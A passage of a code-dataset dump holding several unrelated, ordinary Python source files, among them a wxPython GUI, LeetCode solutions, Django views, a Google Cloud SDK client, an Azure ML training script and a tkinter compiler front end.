self.PulseShaper)\n\t\tsizer.Add(self.SettingsNotebook, pos=(0, 0), span=(1, 1), flag=wx.EXPAND|wx.TOP|wx.LEFT|wx.RIGHT , border=10)\n\n\t\t############################ Command panel ############################\n\t\tboxsizer = wx.BoxSizer (wx.VERTICAL)\n\t\t\n\t\t# Interactively display spectrum\n\t\tboxsizer.Add (self.CreateShowSpectrumButton(), flag=wx.EXPAND, border=5)\n\t\t\n\t\t# Separator\n\t\tboxsizer.Add (wx.StaticText(self.panel), flag=wx.EXPAND, border=5)\n\t\n\t\t# Separator\n\t\tboxsizer.Add (wx.StaticText(self.panel), flag=wx.EXPAND, border=5)\n\t\t\n\t\t# Send random phase to the pulse shaper\n\t\tboxsizer.Add (self.CreateRandomPhaseButton(), flag=wx.EXPAND, border=5)\n\t\t# Send random amplitude to the pulse shaper\n\t\tboxsizer.Add (self.CreateRandomAmplitudeButton(), flag=wx.EXPAND, border=5)\n\t\t# Send zero amplitude and zero phase to the pulse shaper\n\t\tboxsizer.Add (self.CreateZeroAmplitudeButton(), flag=wx.EXPAND, border=5)\n\t\t\n\t\t# Open pulse shaper equalizer\n\t\tboxsizer.Add (self.CreatePulseShaperEqualizerButton(), flag=wx.EXPAND, border=5)\n\t\t\n\t\t# Separator\n\t\tboxsizer.Add (wx.StaticText(self.panel), flag=wx.EXPAND, border=5)\n\t\t\n\t\t# Save settings\n\t\tboxsizer.Add( self.CreateSaveSettingsButton(), flag=wx.EXPAND, border=5)\n\t\t# Load settings\n\t\tboxsizer.Add( self.CreateLoadSettingsButton(), flag=wx.EXPAND, border=5)\n\t\t\n\t\tsizer.Add(boxsizer, pos=(1, 0), span=(1, 1), flag=wx.EXPAND|wx.TOP|wx.LEFT|wx.RIGHT|wx.GROW, border=10)\n\t\t########################### End of constructing panel ######################################\n\t\tself.panel.SetSizer (sizer)\n\t\t\n\t\t############################# Setting visvis #######################################\n\t\tFigure = app.GetFigureClass()\n\t\tself.fig = Figure(self)\n\t\t\n\t\tboxsizer = wx.BoxSizer (wx.HORIZONTAL)\n\t\tboxsizer.Add(self.panel, 0.5, wx.EXPAND)\n\t\tboxsizer.Add(self.fig._widget, 2, wx.EXPAND)\n\t\t\n\t\t#########################################################################################\t\t\t\n\t\tself.SetSizer (boxsizer)\n\t\tself.SetAutoLayout(True)\n\t\tself.Layout() \n\t\t\n#########################################################################\n\nif __name__ == '__main__' :\n\tapp = visvis.use('wx')\n\tapp.Create()\n\tODDExperiment (None)\n\tapp.Run()","sub_path":"util/get_transform_limited_phase/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"127451447","text":"\"\"\"Rotate Image\"\"\"\n\nclass Solution(object):\n def rotate(self, matrix):\n \"\"\"\n :type matrix: List[List[int]]\n :rtype: None Do not return anything, modify matrix in-place instead.\n \"\"\"\n #solution 1\n A[:] = zip(*A[::-1])\n\n\n #solution 2\n n = len(matrix[0])\n m = len(matrix)\n\n for i in range(n):\n for j in range(i, m):\n matrix[i][j], matrix[j][i] = matrix[j][i], matrix[i][j]\n\n for i in range(n):\n matrix[i].reverse()\n\n\n\n \n","sub_path":"48.py","file_name":"48.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"14695521","text":"#============= enthought library imports =======================\nfrom enthought.traits.api import HasTraits, List, Instance\nfrom enthought.traits.ui.api import View, Item, Handler, \\\n TableEditor\nfrom enthought.traits.ui.table_column import ObjectColumn\n\n#============= standard library imports 
========================\n\n#============= local library imports ==========================\nfrom src.database.pychron_database_adapter import PychronDatabaseAdapter\nclass DatabaseTableHandler(Handler):\n def init(self, info):\n '''\n @type info: C{str}\n @param info:\n '''\n info.object.load()\n\nclass DatabaseTableView(HasTraits):\n '''\n G{classtree}\n '''\n items = List\n database = Instance(PychronDatabaseAdapter)\n klass = None\n def traits_view(self):\n '''\n '''\n table = Item('items', show_label = False,\n editor = self.get_table_editor())\n v = View(table,\n handler = DatabaseTableHandler)\n return v\n\n def _table_editor_factory(self, kw):\n '''\n @type kw: C{str}\n @param kw:\n '''\n return TableEditor(**kw)\n\n def get_table_columns(self):\n '''\n '''\n cols = [\n ObjectColumn(name = 'id', editable = False),\n ObjectColumn(name = 'name', editable = False),\n ]\n return cols\n\n def row_factory(self):\n '''\n '''\n if self.klass is not None:\n item = self.klass()\n self._pre_add(item)\n info = item.edit_traits(kind = 'modal')\n if info.result:\n if self.database.connected:\n if self._add_row(item):\n self.items.append(item)\n\n def _pre_add(self, item):\n '''\n @type item: C{str}\n @param item:\n \n subclasses should override this method to load enumeditor lists\n '''\n\n pass\n\n def _add_row(self, item):\n '''\n '''\n pass\n\n\n def load(self, sess = None, refresh = True):\n '''\n @type sess: C{str}\n @param sess:\n\n @type refresh: C{str}\n @param refresh:\n '''\n self.items = []\n if self.database.connected:\n getter = getattr(self.database, 'get_%ss' % self.id)\n items, sess = getter(sess = sess)\n\n if self.klass is not None:\n for i in items:\n nu = self.klass()\n for attr in dir(i):\n if attr[:1] != '_' and attr != 'metadata':\n nu.trait_set(**{attr:str(getattr(i, attr))})\n\n self.items.append(nu)\n\n return sess\n\n#============= views ===================================\n#============= EOF ====================================\n","sub_path":"src/database/plugins/views/database_table_view.py","file_name":"database_table_view.py","file_ext":"py","file_size_in_byte":2902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"401931245","text":"from classtools import AttrDisplay\n\nclass Person(AttrDisplay):\n\n def __init__(self, name, salary=0):\n self.name = name\n self.salary = salary\n\n def giveraise(self, percent):\n self.salary = self.salary*(1 + (percent/100))\n\n\nclass Manager(Person):\n\n def __init__(self, name, salary, xobcode ='Mgr'):\n Person.__init__(self, name, salary)\n self.xobcode = xobcode\n\n\nA = Person('Raj', 30000)\nB = Manager('Garuda', 40000)\n\nprint('person is', A)\nB.giveraise(40)\nprint('Person B', B)\n\n\nclass Super:\n def delegate(self):\n self.action()\n\n\nclass Provider(Super):\n def action(self):\n print('kai zhala')\n\n\nif __name__ == '__main__':\n A = Provider()\n A.delegate()\n\n","sub_path":"testclasstool.py","file_name":"testclasstool.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"309202109","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 15 10:32:04 2018\n\n@author: thieunv\n\nGetter and Setter method: https://www.youtube.com/watch?v=jCzT9XFZ5bw\n \nIf we want use decorator in python 2. 
The class must inheritance from object\n\"\"\"\n\n\nclass Employee(object):\n \n def __init__(self, first, last):\n self.first = first\n self.last = last\n \n @property # Using attribute like a method, getter\n def email(self):\n return \"{}.{}@gmail.com\".format(self.first, self.last)\n \n @property\n def fullname(self):\n return \"{} {}\".format(self.first, self.last)\n \n @fullname.setter\n def fullname(self, name):\n first, last = name.split(\" \")\n self.first = first\n self.last = last\n \n @fullname.deleter\n def fullname(self):\n print(\"Delete Name!\")\n self.first = None\n self.last = None\n \n# Instance\ne1 = Employee(\"nguyen\", \"thieu\")\ne1.fullname = \"truong khang\"\n\nprint (e1.first)\nprint (e1.email)\nprint (e1.fullname)\n\ndel e1.fullname\nprint (e1.first)\nprint (e1.email)\nprint (e1.fullname)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"6_google_trace/tensorflow/exam6.py","file_name":"exam6.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"217791821","text":"# -*- coding: utf-8 -*- #\n# Copyright 2021 Google LLC. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Cloud vmware Clusters client.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nfrom apitools.base.py import list_pager\nfrom googlecloudsdk.api_lib.vmware import util\n\n\nclass ClustersClient(util.VmwareClientBase):\n \"\"\"cloud vmware Clusters client.\"\"\"\n\n def __init__(self):\n super(ClustersClient, self).__init__()\n self.service = self.client.projects_locations_privateClouds_clusters\n\n def Get(self, resource):\n request = self.messages.VmwareengineProjectsLocationsPrivateCloudsClustersGetRequest(\n name=resource.RelativeName())\n return self.service.Get(request)\n\n def Create(self,\n resource,\n node_type=None,\n node_count=None):\n parent = resource.Parent().RelativeName()\n cluster_id = resource.Name()\n cluster = self.messages.Cluster(\n nodeCount=node_count, nodeTypeId=node_type)\n request = self.messages.VmwareengineProjectsLocationsPrivateCloudsClustersCreateRequest(\n parent=parent,\n cluster=cluster,\n clusterId=cluster_id)\n\n return self.service.Create(request)\n\n def Delete(self, resource):\n request = self.messages.VmwareengineProjectsLocationsPrivateCloudsClustersDeleteRequest(\n name=resource.RelativeName())\n return self.service.Delete(request)\n\n def List(self,\n private_cloud_resource,\n filter_expression=None,\n limit=None,\n page_size=None,\n sort_by=None):\n private_cloud = private_cloud_resource.RelativeName()\n request = self.messages.VmwareengineProjectsLocationsPrivateCloudsClustersListRequest(\n parent=private_cloud, filter=filter_expression)\n if page_size:\n request.page_size = page_size\n return list_pager.YieldFromList(\n self.service,\n request,\n limit=limit,\n batch_size_attribute='pageSize',\n batch_size=page_size,\n field='clusters')\n\n def Update(self,\n 
resource,\n node_count=None):\n cluster = self.messages.Cluster(\n nodeCount=node_count)\n request = self.messages.VmwareengineProjectsLocationsPrivateCloudsClustersPatchRequest(\n name=resource.RelativeName(),\n cluster=cluster)\n return self.service.Patch(request)\n","sub_path":"google-cloud-sdk/lib/googlecloudsdk/api_lib/vmware/clusters.py","file_name":"clusters.py","file_ext":"py","file_size_in_byte":2911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"284052957","text":"from django.shortcuts import render, redirect\nfrom .forms import StaffForm\nfrom .models import Staff\n\n# Create your views here.\n\ndef staff_list(request):\n context = {'staff_list' :Staff.objects.all()}\n return render(request,\"staff_register/staff_list.html\",context)\n\ndef staff_form(request,id=0):\n if request.method == \"GET\":\n if id==0:\n form = StaffForm()\n else:\n staff = Staff.objects.get(pk=id)\n form = StaffForm(instance=staff)\n return render(request,\"staff_register/staff_form.html\",{'form':form})\n else:\n if id == 0:\n form = StaffForm(request.POST)\n else:\n staff = Staff.objects.get(pk=id)\n form = StaffForm(request.POST,instance = staff)\n if form.is_valid():\n form.save()\n return redirect('/staff/list')\n\n\ndef staff_delete(request,id):\n staff = Staff.objects.get(pk=id)\n staff.delete()\n return redirect('/staff/list')\n","sub_path":"staff_project/staff_register/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"137983371","text":"# residual_skills.py\n# -------\n# Writes a new CSV with abnormal percentage skills\nimport pandas as pd\nimport statsmodels.formula.api as sm\n\n\ndef write_abn_skills(skills_file_name, market_file_name, output_name):\n # Create file\n g = open(output_name, \"w+\")\n header = \"DATE,TICKER,ABN_PERCENT\\n\"\n g.write(header)\n\n # For ols regression step\n date = [] # list of DATE\n ticker = [] # list of TICKER\n skills = [] # list of PERCENT skills\n mc = [] # list of LN_MCAP\n bm = [] # list of BM\n mom = [] # list of MOM\n # prepare industry dummy lists, n-1 are permitted with NAICS \"11\" omitted\n industry_to_values = {}\n permitted_inds = [\"21\", \"22\", \"23\", \"31\", \"42\", \"44\", \"48\", \"51\", \"52\", \"53\", \"54\", \"55\", \"56\", \"61\",\n \"62\", \"71\", \"72\", \"81\", \"92\"]\n for ind in permitted_inds:\n industry_to_values[ind] = []\n\n skills_f = open(skills_file_name)\n skills_f.readline() # skip header\n skills_lines = skills_f.readlines()\n skills_index = 0\n terminate = False\n with open(market_file_name) as market_f:\n skip = True\n for line in market_f:\n if skip:\n skip = False\n continue\n # split line: 0:DATE,1:TICKER,2:LN_MCAP,3:BM,4:INDUSTRY,5:MOM\n current_market = line.rstrip('\\n').split(',')\n # split line: 0:DATE,1:TICKER,2:PERCENT\n current_skills = skills_lines[skills_index].rstrip('\\n').split(',')\n # market date must be in YYYYMM format\n current_market[0] = current_market[0][:6]\n # check date alignment\n if current_market[0] < current_skills[0]:\n continue\n while current_skills[0] < current_market[0]:\n skills_index += 1\n if skills_index >= len(skills_lines):\n terminate = True\n break\n current_skills = skills_lines[skills_index].rstrip('\\n').split(',')\n if terminate:\n break\n # updated skills ticker passes current market ticker or updated skills date passes current market date\n if current_market[0] < current_skills[0] or 
current_market[1] < current_skills[1]:\n continue\n while current_skills[1] < current_market[1]:\n skills_index += 1\n if skills_index >= len(skills_lines):\n terminate = True\n break\n current_skills = skills_lines[skills_index].rstrip('\\n').split(',')\n # make sure date still aligned\n if current_market[0] < current_skills[0]:\n break\n if terminate:\n break\n # updated skills ticker passes current market ticker or updated skills date passes current market date\n if current_market[0] < current_skills[0] or current_market[1] < current_skills[1]:\n continue\n date.append(current_skills[0])\n ticker.append(current_skills[1])\n # add to regression data\n skills.append(float(current_skills[2]))\n mc.append(float(current_market[2]))\n bm.append(float(current_market[3]))\n mom.append(float(current_market[5]))\n for ind in permitted_inds:\n if current_market[4] == ind:\n industry_to_values[ind].append(1)\n else:\n industry_to_values[ind].append(0)\n # Create pandas data frame and run regression with statsmodels\n df = pd.DataFrame({\"Y\": skills, \"B\": mc, \"C\": bm,\n \"D\": industry_to_values[\"21\"], \"E\": industry_to_values[\"22\"], \"F\": industry_to_values[\"23\"],\n \"G\": industry_to_values[\"31\"], \"H\": industry_to_values[\"42\"], \"I\": industry_to_values[\"44\"],\n \"J\": industry_to_values[\"48\"], \"K\": industry_to_values[\"51\"], \"L\": industry_to_values[\"52\"],\n \"M\": industry_to_values[\"53\"], \"N\": industry_to_values[\"54\"], \"O\": industry_to_values[\"55\"],\n \"P\": industry_to_values[\"56\"], \"Q\": industry_to_values[\"61\"], \"R\": industry_to_values[\"62\"],\n \"S\": industry_to_values[\"71\"], \"T\": industry_to_values[\"72\"], \"U\": industry_to_values[\"81\"],\n \"V\": industry_to_values[\"92\"], \"W\": mom})\n result = sm.ols(formula=\"Y ~ B + C + D + E + F + G + H + I + J + K + L + M + N + O + P + Q + R + S + T + U + V + W\",\n data=df).fit()\n # save ABN_PERCENT skills\n abn = list(result.resid)\n # write output\n for i in range(len(abn)):\n new_line = date[i] + \",\" + ticker[i] + \",\" + str(abn.pop(0)) + \"\\n\"\n g.write(new_line)\n g.close()\n\n\ninput_prefix = \"skills_current_\"\noutput_prefix = \"abn_skills_current_\"\nfor i in range(50):\n write_abn_skills(input_prefix + str(i) + \".csv\", \"market_measures.csv\", output_prefix + str(i) + \".csv\")\ninput_prefix = \"skills_join_\"\noutput_prefix = \"abn_skills_join_\"\nfor i in range(50):\n write_abn_skills(input_prefix + str(i) + \".csv\", \"market_measures.csv\", output_prefix + str(i) + \".csv\")\ninput_prefix = \"skills_leave_\"\noutput_prefix = \"abn_skills_leave_\"\nfor i in range(50):\n write_abn_skills(input_prefix + str(i) + \".csv\", \"market_measures.csv\", output_prefix + str(i) + \".csv\")\n","sub_path":"skills/human-capital/deprecated/residual_skills.py","file_name":"residual_skills.py","file_ext":"py","file_size_in_byte":5362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"581033651","text":"from django.urls import include, path\nfrom rest_framework import routers\nfrom vacine.api import views\n\nrouter = routers.DefaultRouter()\nrouter.register(r'users', views.UserViewSet)\nrouter.register(r'pacientes', views.PacienteViewSet)\n\nurlpatterns = [\n path('', include(router.urls)),\n path('api-auth/', include('rest_framework.urls', 
namespace='rest_framework'))\n]","sub_path":"backend/vacine/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"419329341","text":"class Solution:\r\n def removeDuplicates(self, nums: List[int]):\r\n if not nums:return 0\r\n length=len(nums)\r\n if length==1:return 1\r\n last=nums[0]\r\n for number in nums[1:]:\r\n if number==last:\r\n nums.remove(number)\r\n length-=1\r\n else:\r\n last=number\r\n return length\r\n#this seems really slow...\r\ndef removeDuplicates(self, nums: List[int]):\r\n if not nums:return 0\r\n if len(nums)==1:return 1\r\n tail=0\r\n for i in range(1,len(nums)):\r\n if nums[tail]!=nums[i]:\r\n tail+=1\r\n nums[tail]=nums[i]\r\n return tail+1\r\n#this is faster because it only changes pointer while the previous method modifies the whole array.\r\n","sub_path":"26_remove_duplicates_from_sorted_array.py","file_name":"26_remove_duplicates_from_sorted_array.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"629471552","text":"import logging\nimport logging.config\n\nif __name__ == '__main__' :\n myLogger=logging.getLogger('logtests')\n myLogger.setLevel(logging.DEBUG)\n\n myStreamHandler=logging.StreamHandler()\n myStreamHandler.setLevel(logging.DEBUG)\n myLogger.addHandler(myStreamHandler)\n\n myFormatter=logging.Formatter(\"%(asctime)s-%(name)s-%(msg)s\")\n myStreamHandler.setFormatter(myFormatter)\n\n myLogger.debug(\"This is a debug message.\")\n myLogger.warning(\"This is a warning message.\")\n\n","sub_path":"src/ex23/logtest.py","file_name":"logtest.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"502801050","text":"'''\r\n给你一个由 无重复 正整数组成的集合 nums ,请你找出并返回其中最大的整除子集 answer ,子集中每一元素对 (answer[i], answer[j]) 都应当满足:\r\nanswer[i] % answer[j] == 0 ,或\r\nanswer[j] % answer[i] == 0\r\n如果存在多个有效解子集,返回其中任何一个均可。\r\n\r\n示例 1:\r\n输入:nums = [1,2,3]\r\n输出:[1,2]\r\n解释:[1,3] 也会被视为正确答案。\r\n\r\n示例 2:\r\n输入:nums = [1,2,4,8]\r\n输出:[1,2,4,8]\r\n\r\n提示:\r\n1 <= nums.length <= 1000\r\n1 <= nums[i] <= 2 * 109\r\nnums 中的所有整数 互不相同\r\n'''\r\nfrom leetcode.tools.time import printTime\r\n\r\n\r\nclass Solution:\r\n '''\r\n 遍历 + 记忆化\r\n '''\r\n def largestDivisibleSubset(self, nums):\r\n ret = []\r\n #先排序\r\n nums = sorted(nums)\r\n def sub(nums):\r\n temps = []\r\n for num in nums:\r\n if len(temps) == 0:\r\n temps.append([num])\r\n else:\r\n l = len(temps)\r\n t2 = []\r\n #遍历temps\r\n for i in range(l):\r\n t = temps[i]\r\n #如果能整除最后一个元素,则能整除前面所有元素\r\n if num % t[len(t) - 1] == 0:\r\n t1 = t.copy()\r\n t1.append(num)\r\n #记录最长的集合\r\n if len(t1) > len(t2):\r\n t2 = t1\r\n #保存最长的集合\r\n if len(t2):\r\n temps.append(t2)\r\n #返回temps中最长的集合\r\n for i in range(len(temps) - 1):\r\n if len(temps) > 1 and len(temps[i]) > len(temps[i + 1]):\r\n t = temps[i]\r\n temps[i] = temps[i + 1]\r\n temps[i + 1] = t\r\n return temps[len(temps) - 1]\r\n for i in range(len(nums)):\r\n #如果能被ret[0]整除,以该元素开头的集合肯定小于ret,直接跳过\r\n if not len(ret) or (len(ret) and nums[i] % ret[0] != 0):\r\n temp = sub(nums[i:])\r\n if len(temp) > len(ret):\r\n ret = temp\r\n return ret\r\n '''\r\n DP\r\n '''\r\n @printTime()\r\n def _1largestDivisibleSubset(self, nums):\r\n nums = sorted(nums)\r\n self.len = len(nums)\r\n dp = [[] for i in range(self.len)]\r\n ret = []\r\n for i in range(self.len):\r\n for j in range(0, i):\r\n 
if nums[i] % nums[j] == 0 and dp[j].__len__() + 1 > dp[i].__len__():\r\n dp[i] = dp[j].copy()\r\n dp[i].append(nums[i])\r\n if dp[i].__len__() > ret.__len__():\r\n ret = dp[i]\r\n return ret\r\n\r\nnums = [1,2,4,8,16,32,64,128,256,512,1024,2048,4096,8192,16384,32768,65536,131072,262144,524288,1048576,2097152,4194304,8388608,16777216,33554432,67108864,134217728,268435456,536870912,1073741824]\r\nso = Solution()\r\nprint(so.largestDivisibleSubset(nums))\r\nSolution()._1largestDivisibleSubset(nums)","sub_path":"leetcode/0368_H_最大整除子集.py","file_name":"0368_H_最大整除子集.py","file_ext":"py","file_size_in_byte":3168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"85431014","text":"import cs50\nimport csv\nimport sys\nimport cs50\n\n\n# Connect to database\ndb = cs50.SQL(\"sqlite:///students.db\")\n\n# Check if command-line argument was passed\nif len(sys.argv) != 2:\n print(\"Usage: python filename.py filename.csv\")\n exit()\n\n# Open provided CSV file\nwith open(sys.argv[1]) as csvfile:\n reader = csv.reader(csvfile, delimiter=',')\n for row in reader:\n # Get house of student\n house = row[1]\n\n # Get student's birth year\n birth_year = row[2]\n\n # Get student's names\n full_name = row[0].split(' ')\n\n # Do not include first row\n if len(full_name) == 1:\n continue\n\n # If middle name\n if len(full_name) == 3:\n first_name = full_name[0]\n middle_name = full_name[1]\n last_name = full_name[2]\n\n # Insert into database\n db.execute(\"INSERT INTO students (first, middle, last, house, birth) VALUES (:first, :middle, :last, :house, :birth)\",\n first=first_name, middle=middle_name, last=last_name, house=house, birth=birth_year)\n\n # If no middle name\n elif len(full_name) == 2:\n first_name = full_name[0]\n last_name = full_name[1]\n\n # Insert into database\n db.execute(\"INSERT INTO students (first, last, house, birth) VALUES (:first, :last, :house, :birth)\",\n first=first_name, last=last_name, house=house, birth=birth_year)","sub_path":"import.py","file_name":"import.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"649835137","text":"import argparse\nimport os\nimport pandas as pd\nimport numpy as np\nimport pickle\nimport json\n\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import GradientBoostingRegressor\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import StandardScaler, OneHotEncoder\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn_pandas import DataFrameMapper\nfrom sklearn.externals import joblib\nimport math\nimport azureml.core\nfrom azureml.core import Run\nfrom azureml.core.model import Model\n\nprint(\"In train.py\")\nprint(\"As a data scientist, this is where I write my training code.\")\n\nparser = argparse.ArgumentParser(\"train\")\n\nparser.add_argument(\"--model_name\", type=str, help=\"model name\", dest=\"model_name\", required=True)\n\nargs = parser.parse_args()\n\nprint(\"Argument 1: %s\" % args.model_name)\n\ndata_url = ('https://quickstartsws9073123377.blob.core.windows.net/'\n 'azureml-blobstore-0d1c4218-a5f9-418b-bf55-902b65277b85/'\n 'quickstarts/nyc-taxi-data/nyc-taxi-sample-data.csv')\n\ndf = pd.read_csv(data_url)\nx_df = df.drop(['totalAmount'], axis=1)\ny_df = df['totalAmount']\n\nX_train, X_test, y_train, y_test = train_test_split(x_df, y_df, 
test_size=0.2, random_state=0)\n\ncategorical = ['normalizeHolidayName', 'isPaidTimeOff']\nnumerical = ['vendorID', 'passengerCount', 'tripDistance', 'hour_of_day', 'day_of_week', \n 'day_of_month', 'month_num', 'snowDepth', 'precipTime', 'precipDepth', 'temperature']\n\nnumeric_transformations = [([f], Pipeline(steps=[\n ('imputer', SimpleImputer(strategy='median')),\n ('scaler', StandardScaler())])) for f in numerical]\n \ncategorical_transformations = [([f], OneHotEncoder(handle_unknown='ignore', sparse=False)) for f in categorical]\n\ntransformations = numeric_transformations + categorical_transformations\n\nclf = Pipeline(steps=[('preprocessor', DataFrameMapper(transformations)),\n ('regressor', GradientBoostingRegressor(max_depth=5))])\n\nclf.fit(X_train, y_train)\n\nos.makedirs('./outputs', exist_ok=True)\nmodel_file_name = args.model_name + '.pkl'\nwith open(model_file_name, 'wb') as file:\n joblib.dump(value=clf, filename=os.path.join('./outputs',\n model_file_name))\n\nrun = Run.get_context()\n\ny_predict = clf.predict(X_test)\ny_actual = y_test.values.flatten().tolist()\nrmse = math.sqrt(mean_squared_error(y_actual, y_predict))\nrun.log('rmse', rmse, 'The RMSE score on test data for GradientBoostingRegressor')\nprint('The RMSE score on test data for GradientBoostingRegressor: ', rmse)\n\nos.chdir(\"./outputs\")\n\nmodel_description = 'This model was trained using GradientBoostingRegressor.'\nmodel = Model.register(\n model_path=model_file_name, # this points to a local file\n model_name=args.model_name, # this is the name the model is registered as\n tags={\"type\": \"regression\", \"rmse\": rmse, \"run_id\": run.id},\n description=model_description,\n workspace=run.experiment.workspace\n)\n\nos.chdir(\"..\")\n\nprint(\"Model registered: {} \\nModel Description: {} \\nModel Version: {}\".format(model.name, \n model.description, model.version))\n\n\n\n\n\n","sub_path":"scripts/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"494748025","text":"from collections import deque\nfrom agents.agent import Agent\nimport numpy as np\nfrom task import Task\nimport tensorflow as tf\nimport json\n\ndef train(agent, task):\n rewards = deque(maxlen=100)\n summary = list()\n\n try:\n for episodeId in range(100000):\n episodeReward = 0.0\n state = task.reset()\n\n stepCount = 0\n while True:\n stepCount += 1\n action = agent.act(state)\n nextState, reward, done = task.step(action[0])\n agent.learn(nextState=nextState, reward=reward, done=done)\n state = nextState\n episodeReward += reward\n if done: break\n\n rewards.append(episodeReward)\n avgReward = np.mean(rewards)\n\n print(\"Episode: {} Reward: {:4.3f} Avg. reward: {:4.3f}\". 
\\\n format(episodeId, episodeReward, avgReward))\n\n summary.append({\n \"episodeId\": episodeId,\n \"reward\": episodeReward,\n \"averageReward\": avgReward,\n })\n finally:\n print(\"Dumping summary ...\")\n with open(\"summary.json\", \"w\") as summaryFile:\n json.dump(summary, summaryFile, indent=True)\n\nif __name__ == \"__main__\":\n task = Task()\n\n agent = Agent(\n stateDim=task.state_size,\n actionDim=task.action_size,\n actionBound=[task.action_low, task.action_high],\n actorLearningRate=0.0001,\n criticLearningRate=0.001,\n batchSize=64,\n tau=0.01,\n gamma=0.99,\n bufferSize=1000000,\n seed=1234)\n\n with tf.Session() as session:\n session.run(tf.global_variables_initializer())\n agent.set_session(session)\n train(agent, task)\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"45296149","text":"import tkinter as tk\nfrom compiler.rules import *\nfrom compiler.fsm import *\nfrom compiler.parse_table import *\n\n\nclass Application(tk.Frame):\n def __init__(self, master=None):\n super().__init__(master)\n self.pack()\n self.create_widgets()\n self.src = \"\"\n self.token_list = []\n\n def create_widgets(self):\n self.text_editor = tk.Entry(self, width=50)\n self.text_editor.bind('', self.set_text)\n self.text_editor.pack(side=\"top\")\n self.result = tk.Label(self)\n self.result.pack()\n self.test_text = tk.Text(self)\n self.test_text.pack()\n self.quit = tk.Button(self, text=\"QUIT\", fg=\"red\",\n command=root.destroy)\n self.quit.pack(side=\"bottom\")\n \n def get_text(self):\n self.src = self.text_editor.get()\n\n def set_text(self, event):\n self.get_text()\n lexer = Rules(self.src)\n lexer.run()\n self.test_text.insert('end', \"The action & goto table has been written to the file action_n_goto_table.txt\\n\", 'alert')\n self.test_text.tag_configure('alert', background='green', foreground='black')\n self.test_text.insert('end', '\\n')\n\n self.test_text.insert('end', \"Grammar\\n\", 'grammar')\n self.test_text.tag_configure('grammar', background='black', foreground='green')\n\n # output the grammmar\n g = \"\"\n for x in grammar:\n g += x.start_symbol\n g += \" ->\"\n for y in x.rhs:\n g += \" \"\n g += y\n g += '\\n'\n g += '\\n'\n\n self.test_text.insert('end', g)\n\n #output tokens\n self.test_text.insert('end', \"Token\\n\", 'token')\n self.test_text.tag_configure('token', background='black', foreground='green')\n\n for x in lexer.items:\n self.test_text.insert('end', x[0])\n self.test_text.insert('end', ' ')\n self.token_list.append(x)\n for x in range(0, 3):\n self.test_text.insert('end', '\\n')\n\n #output states\n self.test_text.insert('end', \"States:\\n\", 'states')\n self.test_text.tag_configure('states', foreground='green', background='black')\n\n fsm = FSM()\n fsm_res = fsm.output()\n\n #output goto sentences\n goto_flag = False\n for x in fsm_res:\n if not x[0].isdigit():\n if goto_flag == False:\n self.test_text.insert('end', 'Goto Sentences:\\n', 'goto')\n self.test_text.tag_configure('goto', foreground='green', background='black')\n goto_flag = True\n self.test_text.insert('end', x)\n self.test_text.insert('end', '\\n')\n self.test_text.insert('end', '\\n')\n\n #output parse stack\n self.test_text.insert('end', \"Parse Stack:\\n\", 'parse_stack')\n self.test_text.tag_configure('parse_stack', foreground='green', background='black')\n parse_table = Parse_table()\n parse_table.run(self.token_list)\n for x in 
